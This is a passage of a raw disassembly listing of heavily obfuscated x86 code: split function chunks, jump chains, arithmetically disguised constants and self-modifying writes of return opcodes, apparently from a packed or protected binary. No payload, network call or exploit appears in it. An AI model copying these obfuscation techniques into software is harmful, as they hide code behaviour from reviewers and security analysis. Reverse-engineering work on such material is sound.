; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
jb nullsub_411
jmp sub_441F10
; ---------------------------------------------------------------------------
loc_441708: ; DATA XREF: ut7h7i2x:0043D248o
call sub_44ED9F
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_44170E: ; CODE XREF: sub_44C791-E12Cj
push offset sub_457A0D
jmp loc_451754
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_441718: ; CODE XREF: sub_43B9B1+18101j
jp loc_440E0C
jmp loc_45AA3C
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
jmp ds:dword_41D0C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A33F
loc_441729: ; CODE XREF: sub_44A33F-6955j
jmp sub_4554BD
; END OF FUNCTION CHUNK FOR sub_44A33F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_511. PRESS KEYPAD "+" TO EXPAND]
db 83h
dd 561Ah, 1F35E85Ah
db 1, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_44173A: ; CODE XREF: sub_4489DF+ADABj
jmp sub_4439B0
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44875F
loc_44173F: ; CODE XREF: sub_44875F+19A4j
jmp loc_4404B4
; END OF FUNCTION CHUNK FOR sub_44875F
; ---------------------------------------------------------------------------
loc_441744: ; CODE XREF: ut7h7i2x:0043C9D9j
jmp loc_43DEF9
; ---------------------------------------------------------------------------
loc_441749: ; DATA XREF: ut7h7i2x:00454581o
xchg esi, [esp]
jmp loc_451A25
; ---------------------------------------------------------------------------
mov ds:dword_41D0A0, eax
lea eax, nullsub_538
mov byte ptr [eax], 0C3h
jmp nullsub_538
; =============== S U B R O U T I N E =======================================
sub_441765 proc near ; CODE XREF: sub_410957+14Cp
; ut7h7i2x:0043EFA9j
; DATA XREF: ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00439DDB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B966 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D129 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D21B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EFB4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043FB30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004403CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441113 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044328D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446263 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447472 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044747D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447FAC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AD4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C21C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044DF27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F936 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004539E1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004554FE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004568DE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004588AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004596D1 SIZE 00000014 BYTES
push ebx
push 0FF5D1161h
pop ebx
jmp loc_447472
sub_441765 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_441771: ; CODE XREF: ut7h7i2x:00455233j
push 0F051AC87h
pop ecx
rol ecx, 1
add ecx, 1F9E7825h
mov [ecx], eax
pop ecx
jmp loc_43F4C0
; ---------------------------------------------------------------------------
loc_441787: ; CODE XREF: ut7h7i2x:0044093Ej
; ut7h7i2x:00446A28j
jnz loc_44D3C6
jmp loc_4426CE
; ---------------------------------------------------------------------------
loc_441792: ; DATA XREF: sub_447EB5+CE6Fo
xchg edi, [esp]
mov ebx, edi
pop edi
push 0
push 5DB6706Fh
xchg ecx, [esp]
mov eax, ecx
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_4417A4: ; CODE XREF: sub_43C0DA:loc_45A377j
jmp loc_456858
; END OF FUNCTION CHUNK FOR sub_43C0DA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_305. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_4417AA: ; CODE XREF: sub_446F9A+1Dj
jmp loc_454FF3
; END OF FUNCTION CHUNK FOR sub_446F9A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4417AF proc near ; CODE XREF: sub_442AD1:loc_439374p
; sub_43F62C+2p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A02C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D252 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0043D259 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043DD72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E50E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044039B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441078 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441B4D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004434F8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D6E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A65D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044D447 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044E83B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045312F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457523 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push ecx
push ebx
push 18596B91h
pop ebx
sub ebx, 3D4AD3BEh
jmp loc_45312F
sub_4417AF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_4417C5: ; CODE XREF: sub_43BA9E+F4FEj
pushf
push offset sub_44BE82
jmp loc_4406C9
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_4417D0: ; CODE XREF: sub_44B5CF+5202j
cmp esi, 6781DE02h
loc_4417D6: ; CODE XREF: sub_446F9A:loc_459D84j
jmp loc_4440BF
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4395FB
loc_4417DB: ; CODE XREF: sub_4395FB:loc_43A335j
mov ebx, eax
xchg ebx, [esp+4+var_4]
push 64BD9F17h
xchg ecx, [esp+8+var_8]
mov eax, ecx
pop ecx
sub eax, 59E814A1h
jmp loc_44B97D
; END OF FUNCTION CHUNK FOR sub_4395FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_4417F6: ; CODE XREF: sub_459111-11558j
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_43EBBF
jmp loc_459C53
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
loc_441806: ; CODE XREF: ut7h7i2x:loc_44C870j
push 0FAF4114Dh
pop edi
xor edi, ds:4000FBh
rol edi, 9
xor edi, 8F0689C4h
sub edi, 0DE4CC3F0h
add edi, 0DB871594h
mov [edi], eax
jmp loc_455B27
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_448. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44182F: ; CODE XREF: sub_44F495-7D5Bj
jmp loc_44671B
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
loc_441834: ; CODE XREF: ut7h7i2x:0043C15Ej
jmp loc_4531D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_267. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4463D6
loc_44183A: ; CODE XREF: sub_4463D6-7779j
jmp loc_448A5C
; END OF FUNCTION CHUNK FOR sub_4463D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44183F: ; CODE XREF: sub_448321:loc_45080Aj
; ut7h7i2x:00450826j
xor ebx, 0E198530Fh
add ebx, 0A23C2373h
mov [ebx], eax
pop ebx
lea eax, loc_43B47E
mov byte ptr [eax], 0C3h
jmp loc_44EE32
; END OF FUNCTION CHUNK FOR sub_448321
; =============== S U B R O U T I N E =======================================
sub_44185C proc near ; CODE XREF: sub_40F02F:loc_40F083p
; sub_40F0AC:loc_40F104p ...
; FUNCTION CHUNK AT 0044212A SIZE 00000016 BYTES
push edx
loc_44185D: ; CODE XREF: sub_439D5C+12EF9j
jmp loc_44212A
sub_44185C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E76
loc_441862: ; CODE XREF: sub_44FDF2-AFFBj
; sub_442E76+173E1j
rol edx, 9
xor edx, 2ADF24DAh
add edx, ebp
call sub_445188
loc_441872: ; CODE XREF: ut7h7i2x:0044837Fj
jnp loc_44AE1F
; END OF FUNCTION CHUNK FOR sub_442E76
; =============== S U B R O U T I N E =======================================
sub_441878 proc near ; CODE XREF: sub_45A070-2023Ep
; ut7h7i2x:00441D98j
xchg edx, [esp+0]
loc_44187B: ; CODE XREF: sub_4522DD+2594j
pop edx
add eax, ebp
push offset sub_45A35D
sub_441878 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_441883: ; CODE XREF: sub_44AA54:loc_441EB9j
jmp nullsub_77
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
loc_441888: ; CODE XREF: ut7h7i2x:004539B9j
jz loc_441EB9
jmp loc_45A491
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_559. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_441894 proc near ; CODE XREF: sub_44DF79:loc_4484FEp
; ut7h7i2x:0044F6BDj
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
add ebx, 986BF627h
xchg ebx, [esp-4+arg_0]
jmp sub_43AED9
sub_441894 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4418A6: ; CODE XREF: ut7h7i2x:0045122Dj
lea eax, nullsub_502
mov byte ptr [eax], 0C3h
mov [ebp-4], eax
push 1Ch
lea eax, [ebp-34h]
push eax
mov eax, [ebp-4]
push eax
jmp loc_45251A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_4418C1: ; CODE XREF: sub_450FDE+8B75j
pushf
mov ecx, eax
or edx, ebp
shr eax, 1Dh
loc_4418C9: ; CODE XREF: sub_450FDE:loc_43B9F8j
mov eax, [ebp-4]
jmp loc_4554AE
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450F4F
loc_4418D1: ; CODE XREF: sub_450F4F+1Aj
pop edi
sub edi, 8A453035h
call sub_442836
loc_4418DD: ; CODE XREF: sub_4574D3+7j
jmp nullsub_2
; END OF FUNCTION CHUNK FOR sub_450F4F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448215
loc_4418E2: ; CODE XREF: sub_448215-CF40j
jmp sub_4396F5
; END OF FUNCTION CHUNK FOR sub_448215
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_4418E7: ; CODE XREF: sub_4459EE+13BC9j
mov edi, 70D29B9Ah
sbb ebp, ecx
jb loc_458D8C
jmp loc_4429E3
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4522DD
loc_4418F9: ; CODE XREF: sub_4522DD:loc_45308Aj
and eax, 0F353B391h
jnz loc_45487D
xor ebp, ecx
mov esi, [ebx]
jmp loc_454870
; END OF FUNCTION CHUNK FOR sub_4522DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BCCB
loc_44190E: ; CODE XREF: sub_44BCCB:loc_451F29j
mov eax, [ebp-0Ch]
cmp eax, [ebp-14h]
jb loc_44D410
push offset loc_443B5F
jmp nullsub_251
; END OF FUNCTION CHUNK FOR sub_44BCCB
; =============== S U B R O U T I N E =======================================
sub_441924 proc near ; DATA XREF: ut7h7i2x:0043EC29o
; FUNCTION CHUNK AT 00457DF7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459626 SIZE 0000000B BYTES
pop edi
mov eax, [ebp-0Ch]
push 0A848F4A3h
pop ecx
add ecx, 0BA3D853Dh
jmp loc_459626
sub_441924 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_441939: ; CODE XREF: ut7h7i2x:0043FC0Dj
jle loc_4448C2
; =============== S U B R O U T I N E =======================================
sub_44193F proc near ; CODE XREF: ut7h7i2x:0043F6DFp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0045A8DC SIZE 00000006 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [esp-4+arg_0]
jmp loc_45A8DC
sub_44193F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44194B: ; DATA XREF: sub_44E2E0:loc_44C5B5o
pushf
call sub_454F0A
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_441951: ; CODE XREF: sub_43DD17+13E47j
jmp nullsub_133
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_441956: ; CODE XREF: sub_459653-2041Aj
jmp loc_452122
; END OF FUNCTION CHUNK FOR sub_459653
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_44195B: ; CODE XREF: sub_447CBE:loc_44564Aj
; ut7h7i2x:00445669j
and ebx, 0C400B0F5h
xor ebx, 45875D0Dh
xor eax, ebx
pop ebx
ror eax, 1Bh
push edx
loc_44196E: ; CODE XREF: sub_43CE34+5945j
push 2FB1745Ch
jmp loc_449345
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
pushf
and eax, ebp
jmp sub_4479B3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_441980: ; CODE XREF: sub_44C99C:loc_44C621j
xor ebp, ecx
add edx, ebx
jmp loc_451AD6
; END OF FUNCTION CHUNK FOR sub_44C99C
; =============== S U B R O U T I N E =======================================
sub_441989 proc near ; DATA XREF: sub_456EE0:loc_442C0Do
mov eax, [esp+0]
push edx
call sub_44A833
push 950B1B97h
pop eax
add eax, 233C4937h
rol eax, 16h
push offset loc_440042
jmp nullsub_277
sub_441989 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456CBD
loc_4419AB: ; CODE XREF: sub_456CBD-6C6Aj
xchg ebx, [esp+0]
call sub_44B72F
locret_4419B3: ; CODE XREF: sub_4565F6:loc_43A070j
retn
; END OF FUNCTION CHUNK FOR sub_456CBD
; ---------------------------------------------------------------------------
pop ebp
jmp sub_452802
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_545. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A65
loc_4419BB: ; CODE XREF: sub_443A65+BB7Fj
call sub_4508DB
mov eax, 0F75CA70h
call sub_43AA94
mov ds:off_41D0D8, eax
lea eax, loc_44F5D9
mov byte ptr [eax], 0C3h
jmp loc_43CB30
; ---------------------------------------------------------------------------
loc_4419DE: ; CODE XREF: sub_443A65:loc_44F5D9j
xchg ecx, [esp+0]
jmp loc_43D1A0
; END OF FUNCTION CHUNK FOR sub_443A65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_4419E6: ; CODE XREF: sub_452D3D-180D7j
test edi, 4152929Ah
jmp loc_45073C
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
mov ds:dword_41D0F0, eax
lea eax, nullsub_78
mov byte ptr [eax], 0C3h
jmp loc_457EAB
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
jmp loc_43DCCC
; ---------------------------------------------------------------------------
loc_441A0E: ; DATA XREF: sub_457A0D:loc_44F44Fo
mov eax, 0E0h
call sub_4448AF
jmp loc_44E4AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A0D
loc_441A1D: ; CODE XREF: sub_457A0D+7j
jns loc_453317
call sub_44C2ED
loc_441A28: ; CODE XREF: ut7h7i2x:00451DD5j
and ebp, 50BDF425h
loc_441A2E: ; CODE XREF: ut7h7i2x:loc_450A3Dj
mov eax, 400h
; END OF FUNCTION CHUNK FOR sub_457A0D
; START OF FUNCTION CHUNK FOR sub_44865D
loc_441A33: ; CODE XREF: sub_44865D:loc_44B9DBj
push eax
mov eax, ecx
xchg eax, [esp+0]
push offset loc_44512F
loc_441A3E: ; CODE XREF: ut7h7i2x:loc_447710j
jmp loc_441B48
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_441A43: ; CODE XREF: sub_45967C-64B3j
jl loc_445DDE
jle loc_44E4AB
jmp loc_44CD45
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_441A54: ; CODE XREF: sub_43AB62:loc_45685Dj
jz loc_450227
jmp loc_458300
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
loc_441A5F: ; CODE XREF: ut7h7i2x:0044E47Cj
ror esi, 7
test esi, 0CBD0F2A9h
jmp loc_4420EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443C4A
loc_441A6D: ; CODE XREF: sub_443C4A:loc_44DBCCj
jnz loc_43BEED
jmp loc_43A671
; END OF FUNCTION CHUNK FOR sub_443C4A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_530. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_441A79 proc near ; CODE XREF: sub_4589E0-19A88j
; sub_44E2AA:loc_440B17p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043ACB6 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004521A7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045AD98 SIZE 00000005 BYTES
call sub_44C9F5
loc_441A7E: ; CODE XREF: sub_445056+8355j
jmp loc_43ACB6
sub_441A79 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456111
loc_441A83: ; CODE XREF: sub_456111-8DDAj
jmp loc_455941
; END OF FUNCTION CHUNK FOR sub_456111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_441A88: ; CODE XREF: sub_44C852-1323Fj
jmp sub_444E04
; END OF FUNCTION CHUNK FOR sub_44C852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_441A8D: ; CODE XREF: sub_449700:loc_447A0Dj
jl loc_457384
test edi, ecx
jmp loc_441566
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4570FD
loc_441A9A: ; CODE XREF: sub_4570FD:loc_448CB2j
add edx, 5C33C6FEh
adc edi, ebp
jmp loc_44B0E4
; END OF FUNCTION CHUNK FOR sub_4570FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456E7D
loc_441AA7: ; CODE XREF: sub_456E7D-A7D8j
jns loc_43F7EB
cdq
loc_441AAE: ; CODE XREF: sub_456E7D-A7E4j
and eax, 0B8CEB9DFh
add eax, 478001F5h
popf
xchg eax, [esp+4+var_4]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_456E7D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_441AC3: ; CODE XREF: sub_45500F:loc_457718j
add edx, ebp
push offset sub_44D5DC
jmp loc_44E565
; END OF FUNCTION CHUNK FOR sub_45500F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_441ACF: ; CODE XREF: sub_444851:loc_453E77j
push ecx
push 7E182669h
pop ecx
rol ecx, 19h
xor ecx, 0C51E738Bh
add ecx, 0E8624541h
xchg ecx, [esp+8+var_8]
jmp loc_441DDA
; END OF FUNCTION CHUNK FOR sub_444851
; =============== S U B R O U T I N E =======================================
sub_441AED proc near ; CODE XREF: sub_444851+35B2p
; FUNCTION CHUNK AT 004391F3 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043BAB4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043D759 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441FA2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004433F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CC7A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459CC6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045A513 SIZE 0000001D BYTES
push ebp
jmp loc_43D759
sub_441AED endp
; ---------------------------------------------------------------------------
loc_441AF3: ; CODE XREF: ut7h7i2x:0044127Ej
jnz loc_43F222
jmp loc_4493FC
; ---------------------------------------------------------------------------
rol esi, 7
and esi, edi
jmp sub_449DC4
; ---------------------------------------------------------------------------
loc_441B08: ; CODE XREF: ut7h7i2x:0043B41Cj
jle loc_448BA9
sbb edx, 59A4B79Dh
jmp loc_4409A8
; ---------------------------------------------------------------------------
test al, al
jz loc_4455A7
jmp loc_4440A0
; ---------------------------------------------------------------------------
and esi, 3185272Dh
mov ebx, 0B8573453h
jmp sub_43DC5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456DB3
loc_441B36: ; CODE XREF: sub_456DB3:loc_447338j
; ut7h7i2x:0044734Fj
xor edi, 3605203Bh
add edi, 0AA1AA5FDh
call sub_44F495
locret_441B47: ; CODE XREF: sub_43C969:loc_453D73j
retn
; END OF FUNCTION CHUNK FOR sub_456DB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_441B48: ; CODE XREF: sub_44865D:loc_441A3Ej
jmp nullsub_82
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_441B4D: ; CODE XREF: sub_4417AF-731j
jmp loc_457523
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_441B52: ; CODE XREF: sub_43CAF4+14j
jmp loc_43A749
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
add edi, 8B8CB21Fh
cdq
pop ebp
jmp loc_44F125
; ---------------------------------------------------------------------------
rol edx, 0Eh
jmp sub_4482AE
; ---------------------------------------------------------------------------
loc_441B6C: ; CODE XREF: ut7h7i2x:00448115j
jz loc_446A3C
jmp loc_43C304
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_381. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_441B78: ; CODE XREF: sub_44B72F-F321j
jmp loc_44AAE4
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_441B7D: ; CODE XREF: sub_45A79F+526j
xchg ebp, [edx]
and esi, ebp
jmp loc_44BD4D
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
jno loc_44D026
jmp sub_44E2E0
; ---------------------------------------------------------------------------
rol edx, 18h
jmp sub_445A04
; ---------------------------------------------------------------------------
loc_441B99: ; DATA XREF: ut7h7i2x:004412D9o
sub al, 99h
push 85140554h
pop edx
rol edx, 11h
and edx, 3C3F20A5h
rol edx, 8
and edx, 0F052F8FAh
cmp edx, 759C5EF7h
jmp loc_43BA84
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_441BBE: ; CODE XREF: sub_444273:loc_43EC8Ej
; ut7h7i2x:0043ECA5j
and eax, 0C741F3DAh
sub eax, 4534C42Ah
add eax, 0FE7892DCh
mov eax, [eax]
push offset sub_43D021
jmp loc_449EB7
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
mov eax, 0EF9F7D01h
push ebx
push 0E4704566h
xor ebx, ecx
jmp loc_4592CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_527. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_441BEF: ; CODE XREF: ut7h7i2x:004492E5j
jmp loc_441C85
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448503
loc_441BF4: ; CODE XREF: sub_448503+Ej
jmp loc_4589A4
; END OF FUNCTION CHUNK FOR sub_448503
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_441BF9: ; CODE XREF: sub_44A3BB+91F0j
jge loc_44D749
loc_441BFF: ; CODE XREF: ut7h7i2x:0044F568j
jmp loc_43EA97
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
sbb ebp, edx
jmp loc_44D747
; ---------------------------------------------------------------------------
loc_441C0B: ; CODE XREF: ut7h7i2x:0044E794j
mov ebx, [ebp+0]
; =============== S U B R O U T I N E =======================================
sub_441C0E proc near ; CODE XREF: sub_44697F-2A63p
; FUNCTION CHUNK AT 00455A04 SIZE 0000000A BYTES
xchg esi, [esp+0]
pop esi
add eax, ebp
add eax, 1328C320h
jmp loc_455A04
sub_441C0E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_441C1F: ; CODE XREF: sub_44DEFF:loc_446D6Cj
push edx
pop ebx
xchg ebx, [esp-8+arg_4]
call sub_44DEFF
loc_441C29: ; CODE XREF: ut7h7i2x:004483BCj
jmp nullsub_143
; END OF FUNCTION CHUNK FOR sub_44DEFF
; ---------------------------------------------------------------------------
jmp loc_45086C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A83C
loc_441C33: ; CODE XREF: sub_45A83C:loc_452B4Aj
and esi, ds:4000F0h
add esi, 6E44DFF3h
xchg esi, [esp+4+var_4]
jmp loc_45AD0A
; END OF FUNCTION CHUNK FOR sub_45A83C
; ---------------------------------------------------------------------------
xor ecx, edx
jmp sub_44C595
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_441C4E: ; CODE XREF: sub_43EF73+D33Fj
jnz loc_456E5C
jmp loc_458A72
; END OF FUNCTION CHUNK FOR sub_43EF73
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_467. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_441C5A: ; CODE XREF: sub_45341C+6F89j
jmp loc_459218
; END OF FUNCTION CHUNK FOR sub_45341C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_441C5F: ; CODE XREF: sub_43FF65+B962j
jmp loc_44698B
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_441C64: ; CODE XREF: sub_44E6B4-C494j
jmp loc_4460CE
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
loc_441C69: ; CODE XREF: ut7h7i2x:004457A1j
add ebx, ebp
; =============== S U B R O U T I N E =======================================
sub_441C6B proc near ; CODE XREF: sub_44FD54+1F1Bp
; FUNCTION CHUNK AT 004415B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004564E8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004587B9 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov byte ptr [eax], 6Ch
jmp loc_4415B9
sub_441C6B endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_517. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A76A
loc_441C78: ; CODE XREF: sub_43A76A+17AD2j
adc ecx, 20E627AEh
xchg ecx, eax
jmp loc_459B68
; END OF FUNCTION CHUNK FOR sub_43A76A
; ---------------------------------------------------------------------------
loc_441C85: ; CODE XREF: ut7h7i2x:loc_441BEFj
sub ebp, ebx
popf
xchg ebx, ecx
jmp loc_43E860
; =============== S U B R O U T I N E =======================================
sub_441C8F proc near ; CODE XREF: ut7h7i2x:0044AD14j
; sub_439788:loc_44CD9Ep
; FUNCTION CHUNK AT 0043E771 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B6AB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FF3A SIZE 00000018 BYTES
xchg edx, [esp+0]
pop edx
add eax, [ebp-4]
mov [ebp-14h], eax
mov eax, [ebp-14h]
mov eax, [eax+18h]
dec eax
jmp loc_43E771
